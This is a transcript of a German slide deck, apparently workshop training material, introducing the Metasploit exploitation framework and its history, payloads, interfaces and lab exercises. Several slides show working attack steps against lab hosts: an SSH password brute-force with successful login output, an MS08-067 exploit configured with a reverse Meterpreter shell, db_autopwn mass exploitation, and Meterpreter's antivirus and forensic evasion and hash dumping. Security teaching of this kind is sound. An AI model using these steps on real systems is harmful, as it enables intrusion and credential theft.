metasploit framework unleashed beyond metasploit · penetration tests vs. vulnerability scanning...
TRANSCRIPT
![Page 1: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/1.jpg)
Metasploit Framework Unleashed – beyond Metasploit
![Page 2: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/2.jpg)
Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell
Meterpreter MSF in der Anwendung Benutzeroberflächen
Scanning (Auxiliary Modules)▪ Datenbanken
▪ Passwörter – Teil 1
Automatisiertes Hacking Ausblicke …
<< Content <<
![Page 3: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/3.jpg)
Vulnerability Scans / Vulnerability Management Technische IT-Sicherheitsüberprüfungen ausgewählter/aller
Systeme/(Anwendungen) Automatisierte Prüfungen Compliance (z.B. PCI – 4 x Jährlich)
Pentests Technische IT-Sicherheitsüberprüfungen ausgewählter/aller
Systeme/Anwendungen Simulation eines Angreifers Manuelle und automatisierte Prüfung Kombination mehrerer Schwachstellen → Eskalationskette Darstellung des realen Bedrohungsszenarios Compliance (z.B. PCI – 1 x Jährlich)
<< Intro <<
![Page 4: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/4.jpg)
Was umfassen Exploiting Frameworks? Vulnerability Scanner
▪ Meist durch Schnittstellen zu externen Produkten realisiert
Passwort Scanner Portscanner Service Scanner Exploits ;) Shells/Payloads (Reverse/Bind/HTTP(S)/DNS…) Agents (persistent/non persistent) Zentrale Management Konsole Scriptingfunktionalität Versch. Automatisierungsmechanismen Fuzzer und weitere Research Möglichkeiten
<< Intro <<
![Page 5: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/5.jpg)
Vorteile ~ umfangreiches Framework Einheitlich Getestet Verlässlich Automatisiert
Nachteile ~ umfangreiches Framework Einheitlich Getestet Verlässlich Automatisiert
• Out of the box thinking?• Kreativität des Testers?• Know How des Testers?• Werkzeug für N00bs?• … und Scriptkiddies?
<< Intro <<
![Page 6: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/6.jpg)
Core Impact von Core Security
http://www.coresecurity.com/content/core-impact-overview
Canvas von Immunity
http://www.immunitysec.com/products-canvas.shtml
Metasploit von Rapid 7
http://www.metasploit.com/
<< Frameworks <<
![Page 7: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/7.jpg)
<< Core Impact <<
![Page 8: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/8.jpg)
drag & drop
<< Core Impact <<
![Page 9: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/9.jpg)
Hilfestellung:
<< Core Impact <<
![Page 10: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/10.jpg)
<< Canvas <<
![Page 11: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/11.jpg)
2003 – Gründung durch HD Moore V1.0 – 11 Exploits V2.0 – Framework wurde neu geschrieben (Perl) V2.2 – Meterpreter V2.7 – 150 Module, 44.000 Zeilen Sourcecode V3.0 – Ruby V3.1 – 450 Module, 150.000 Zeilen Sourcecode V3.2 – 570 Module, 300.000 Zeilen Sourcecode Ende 2009 – Übernahme durch Rapid 7 V3.3 - ~800 Module, ~420.000 Zeilen Sourcecode, Rapid7
Juni 2010 V3.4 – Metasploit Express (Support/Kommerzielle GUI/3k$)
Metasploit wird erwachsen
<< History <<
![Page 12: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/12.jpg)
Metasploit everywhere …
Linux
Windows
Mac OS X
BSD
OpenWRT
IPhone/IPod Touch
…
<< Everywhere<<
![Page 13: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/13.jpg)
Bind Payload
“Bad Guy”
Exploit
Payload Connection
Bind Shell
<< Payloads <<
![Page 14: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/14.jpg)
Bind Payload broken
“Bad Guy”
Exploit
Payload Connection
Bind Shell
<< Payloads <<
![Page 15: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/15.jpg)
Reverse Payloads
“Bad Guy”
Exploit
Payload Connection
<< Payloads <<
![Page 16: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/16.jpg)
Verschlüsselte Verbindung (SSLv3)
Viel Spaß dem IDS
Läuft ausschließlich im Arbeitsspeicher
Viel Spaß dem Forensiker
AV Evading
Viel Spaß dem Virenscanner
Upload/Download Files
In andere Prozesse migrieren
Systeminfos - ps/getuid/migrate/getpid
Meterpreter Scripte
hashdump
Automatisierter Post Exploiting Vorgang (run winenum)
<< Meterpreter <<
![Page 17: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/17.jpg)
Auf Backtrack wgethttp://updates.metasploit.com/data/releases/framework-3.5.0-linux-i686.run
Backup erstellenroot@bt:~# ls -d /opt/metasploit3*
/opt/metasploit33-stable /opt/metasploit334
/opt/metasploit331 /opt/metasploit341
/opt/metasploit333 /opt/metasploit34-stable
./framework-3.5.0-linux-i686.run … und gut is
Linux allgemein http://www.metasploit.com/redmine/projects/framework/wiki/Install_Linux
<< Install <<
![Page 18: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/18.jpg)
root@bt:/opt/metasploit35-dev/msf3#
./msfupdate
[*]
[*] Attempting to update the Metasploit
Framework...
[*]
…
Updated to revision 10853.
root@bt:/opt/metasploit35-dev/msf3# svn
update
At revision 10853.
<< Update <<
![Page 19: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/19.jpg)
Wird nicht weiter gepflegt
Buggy Gut für einfache
Demonstrationen Gut für
Dokumentationen
<< MSFWeb<<
Im Oktober aus MSF entfernt
![Page 20: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/20.jpg)
root@bt:~# /opt/metasploit34-stable/msf3/msfweb -h
[*] Warning: As of Metasploit 3.3 this interface is
no longer supported:
Usage: msfweb <options>
OPTIONS:
-a <opt> Bind to this IP address instead of
loopback
-d Daemonize the web server
-h Help banner
-p <opt> Bind to this port instead of 55555
-s Automatically open the browser
<< MSFWeb<<
![Page 21: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/21.jpg)
Wird nicht weiter gepflegt
Buggy Gut für einfache
Demonstrationen Gut für
Dokumentationen
Im Juli aus MSF entfernt und durch eine neue GUIersetzt!
<< MSFGUI<<
![Page 22: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/22.jpg)
Neue gui …
<< MSFGUI<<
![Page 23: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/23.jpg)
<< MSFCLI<<
![Page 24: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/24.jpg)
<< Express <<
Support Webgui Optimierter Pentesting Workflow Integration weiterer Tools
und Scanner Automatisierung rockt
![Page 25: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/25.jpg)
<< Express <<
![Page 26: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/26.jpg)
<< CONSOLE <<
![Page 27: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/27.jpg)
<< CONSOLE <<
msf > help
Core Commands=============
Command Description------- -----------? Help menuback Move back from the current contextbanner Display an awesome metasploit bannercd Change the current working directorycolor Toggle colorconnect Communicate with a hostexit Exit the consolehelp Help menuinfo Displays information about one or more moduleirb Drop into irb scripting modejobs Displays and manages jobskill kill a jobload Load a framework pluginloadpath Searches for and loads modules from a pathquit Exit the consoleresource Run the commands stored in a fileroute Route traffic through a sessionsave Saves the active datastoressearch Searches module names and descriptionssessions Dump session listings and display information about sessionsset Sets a variable to a value
<snip>
![Page 28: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/28.jpg)
connect check scanner/snmp/community scanner/smb/smb_login scanner/smb/smb_version scanner/smb/smb_enumusers scanner/smb/smb_enumshares auxiliary/gather/dns_enum auxiliary/scanner/discovery/arp_sweep scanner/vnc/vnc_none_auth
server/browser_autopwn Aber das ist eine andere Geschichte
<< Scanning <<
Nur ein sehr kleiner Auszug aller verfügbaren Module
msf > search -t
auxiliary
![Page 29: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/29.jpg)
Metasploit ist kein Allheilmittel!
Connect - netcat, Nmap
SNMP-Stuff - snmpcheck.pl, Nmap
SMB Stuff - samrdump.py, Nmap
dns_enum - dig usw.
arp_sweep - Nmap
vnc_none_auth - Nmap, MSFv2 (realvnc_41_bypass)
<< Scanning <<
![Page 30: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/30.jpg)
Passwort Fumsf > search -t auxiliary _login[*] Searching loaded modules for pattern '_login'...
Auxiliary=========
Name Disclosure Date Rank Description---- --------------- ---- -----------admin/oracle/oracle_login 2008-11-20 normal Oracle Account Discovery.scanner/ftp/ftp_login normal FTP Authentication Scannerscanner/http/axis_login normal Apache Axis2 v1.4.1 Brute Force Utilityscanner/http/frontpage_login normal FrontPage Server Extensions Login Utilityscanner/http/http_login normal HTTP Login Utilityscanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utilityscanner/http/wordpress_login_enum normal Wordpress Brute Force and User Enumeration Utilityscanner/lotus/lotus_domino_login normal Lotus Domino Brute Force Utilityscanner/mssql/mssql_login normal MSSQL Login Utilityscanner/mysql/mysql_login normal MySQL Login Utilityscanner/postgres/postgres_login normal PostgreSQL Login Utilityscanner/smb/smb_login normal SMB Login Check Scannerscanner/ssh/ssh_login normal SSH Login Check Scannerscanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scannerscanner/telnet/telnet_login normal Telnet Login Check Scanner
<< Scanning <<
![Page 31: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/31.jpg)
Passwort Fu
msf auxiliary(ssh_login) > run
[*] 10.8.28.66:12345 - SSH - Starting buteforce[*] 10.8.28.66:12345 - SSH - Trying: username: 'sysadm' with
password: ''[-] 10.8.28.66:12345 - SSH - Failed: 'sysadm':''[*] 10.8.28.66:12345 - SSH - Trying: username: 'sysadm' with
password: '777777'[*] Command shell session 1 opened (10.8.28.9:57817 ->
10.8.28.66:12345) at Mon Nov 01 17:02:43 +0100 2010[+] 10.8.28.66:12345 - SSH - Success: 'sysadm':'777777'
'uid=1000(sysadm) gid=1000(sysadm) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(sysadm) Linux pown-me 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
<< Scanning <<
![Page 32: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/32.jpg)
msf > search -t auxiliarymssql|mysql|oracle|postgre
admin/mssql/mssql_enumadmin/mssql/mssql_execadmin/mysql/mysql_enumadmin/oracle/oracle_loginadmin/oracle/oraenumadmin/oracle/sid_brutescanner/mssql/mssql_loginscanner/mysql/mysql_loginscanner/mysql/mysql_versionadmin/postgres/postgres_readfile
<< Datenbanken <<
![Page 33: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/33.jpg)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.8.28.9
LHOST => 10.8.28.9
msf exploit(ms08_067_netapi) > set RHOST 10.8.28.244
RHOST => 10.8.28.244
msf exploit(ms08_067_netapi) > exploit
<< Exploiting<<
![Page 34: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/34.jpg)
<< auto hacking <<
msf > db_import
db_import
db_import_ip_list
db_import_nessus_nbe
db_import_nmap_xml
db_import_amap_mlog
db_import_msfe_xml
db_import_nessus_xml
db_import_qualys_xml
msf > db_autopwn
![Page 35: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/35.jpg)
<< auto hacking <<
msf > db_driver
msf > db_create [database] / db_connect
msf > db_import_xyz
msf > db_hosts
msf > db_services
msf > db_vulns
msf > db_autopwn
[*] Usage: db_autopwn [options]
<snip>
-t Show all matching exploit modules
-x Select modules based on vuln. references
-p Select modules based on open ports
-e Launch exploits against all targets
-R [rank] Only run modules with a minimal rank
<snip>
![Page 36: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/36.jpg)
<< auto hacking <<
msf > db_driver
msf > db_create [database] / db_connect
msf > load nexpose
msf > nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
msf > nexpose_scan 192.168.0.100
msf > db_autopwn –t -x
![Page 37: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/37.jpg)
Metasploitable – db_autopwn/msf express rockt ;)▪ http://www.metasploit.com/documents/express/Metasploitable.txt
Windows XP for free ;)▪ http://www.offensive-security.com/metasploit-
unleashed/metasploit-unleashed-free-information-security-training
Fedora Core 4 Ubuntu 7.04 Alte Windows und Linux Systeme …
<< Trockenübung <<
![Page 38: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/38.jpg)
Jetzt – hacking the lab
Nachmittag:
Fancy – client side kung fu
SMTX – client side kung fu part 2
M1k3 – meterpreter kung fu
<< and now? <<
![Page 39: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/39.jpg)
Information is everything DNS Analyse
SNMP Scans
SMB Scans
Portscans (Nmap/interne Module)
Findet die Datenbanken
Password attacks (SSH/Telnet/DB/SMB/….)
Findet Systeme die auf MS08-067 anfällig sind
VNC Analyse …
Exploitet was geht
<< hacking the lab <<
![Page 40: Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter](https://reader030.vdokument.com/reader030/viewer/2022021505/5ad9a8557f8b9a6d318ba47d/html5/thumbnails/40.jpg)
<< thx <<
Contact: [email protected] http://www.s3cur1ty.de http://www.back-track.de http://www.metasploit.eu